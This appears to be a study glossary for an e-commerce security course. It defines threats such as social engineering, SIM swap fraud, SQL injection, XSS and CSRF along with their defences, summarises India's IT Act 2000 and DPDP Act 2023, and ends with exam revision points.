Social Engineering — Manipulating a human into performing an action or revealing information they should not. Variants include phishing, pretexting (pose as authority — "this is HR, share your password"), baiting (drop infected USB drives), tailgating (follow someone through a secure door), and quid pro quo ("I'll help you in exchange for your credentials"). Kevin Mitnick was the most famous practitioner; modern attacks frequently start with social engineering before any technical exploit.
SIM Swap Fraud — A growing Indian threat: the attacker uses social engineering (or an inside helper at the telecom) to get the victim's mobile number transferred to a SIM the attacker controls. Once they own the number, they receive every OTP — for banks, wallets, exchanges — and can drain accounts within hours.
SQL Injection (SQLi) — An application-level attack where the attacker injects malicious SQL fragments into an input that gets concatenated into a database query. Properly parameterised queries (prepared statements) eliminate this class of vulnerability. SQLi remains one of the OWASP Top 10 a quarter-century after it was first described, because so much new code still gets it wrong.
Cross-Site Scripting (XSS) — An attack where the attacker injects JavaScript into a page that gets executed in another user's browser — letting the attacker steal cookies, hijack sessions, or perform actions on the victim's behalf. Three sub-types: stored (script saved in DB), reflected (script in URL), and DOM-based (entirely client-side). The defence is consistent output encoding plus Content-Security-Policy headers.
Cross-Site Request Forgery (CSRF) — An attack that tricks a victim's browser into sending an authenticated request to a site they're logged into ("transfer ₹50,000 to attacker's account") without the victim's knowledge. The defence is CSRF tokens and SameSite cookies.
Broken Access Control — Number 1 on the OWASP Top 10 (2021): users can access data or actions they should not be allowed to — by guessing URLs, manipulating request IDs, or escalating privileges. The defence is enforcing authorisation on the server for every action, not just hiding UI elements on the client.
Insider Threat — A security risk originating from someone with legitimate access — a current employee, contractor, or former employee whose credentials still work. Insider threats can be malicious (deliberate data theft) or negligent (lost laptop, accidentally emailed file). Verizon's annual Data Breach Investigations Report consistently finds that a majority of breaches involve a human element (a phished employee, a misconfiguration, a lost device), even when the attacker is external.
IT Act 2000 — India's primary statute governing electronic commerce and cybercrime. It legally recognises electronic records and digital signatures, sets the rules for intermediary liability, and codifies most cyber-offences (hacking, identity theft, phishing, cyberterrorism, obscene content). Amended in 2008 to address newer offences.
DPDP Act 2023 (Digital Personal Data Protection Act) — India's comprehensive data-protection law (enacted 2023). It defines the rights of Data Principals (individuals), obligations of Data Fiduciaries (entities that decide how personal data is processed), the role of the Data Protection Board, and penalties of up to ₹250 crore per instance for serious failures such as not taking reasonable security safeguards. It applies to digital personal data processed within India, and to processing outside India when it is connected with offering goods or services to Data Principals in India.
---
Study deep
- The attack surface is huge. A typical e-commerce site has 100+ endpoints, dozens of third-party scripts, hundreds of vendors. Each is a potential attack vector. Security is layered, not absolute.
- Insider threats are underestimated. Most breaches involve a human element, whether negligence or malice, even when the attacker is external. Phishing of an employee followed by an external intrusion is the most common pattern.
- The cost of a breach is high. IBM's Cost of a Data Breach report put the global average at about $4.45 million in 2023; India's average is lower (about ₹18 crore in the same report) but rising. Brand damage, customer churn, and regulatory fines (GDPR up to 4% of global annual turnover or €20 million, whichever is higher) add to it.
- Compliance is necessary but not sufficient. PCI-DSS, ISO 27001, SOC 2 — compliance doesn't equal security. Many breached companies were compliant on paper.
- Security is a shared responsibility. Customer ↔ Merchant ↔ Payment gateway ↔ Card network. Each must do their part. RBI's 2-factor auth mandate, PCI-DSS for merchants, EMV for cards — all cooperative layers.
PYQ pattern (very common): "Discuss security threats in e-commerce." — Categorise (cybercrime, fraud, network, app, insider); list 6-8 specific threats (phishing, spoofing, sniffing, DoS, MITM, identity theft, SQL injection, social engineering); explain 2-3 with examples.
PYQ pattern: "What is DoS / DDoS attack? Explain its types and defences." — Define DoS vs DDoS; 4 types (volumetric, protocol, app-layer, amplification); 5 defences (CDN, rate-limit, CAPTCHA, scrubbing, auto-scale).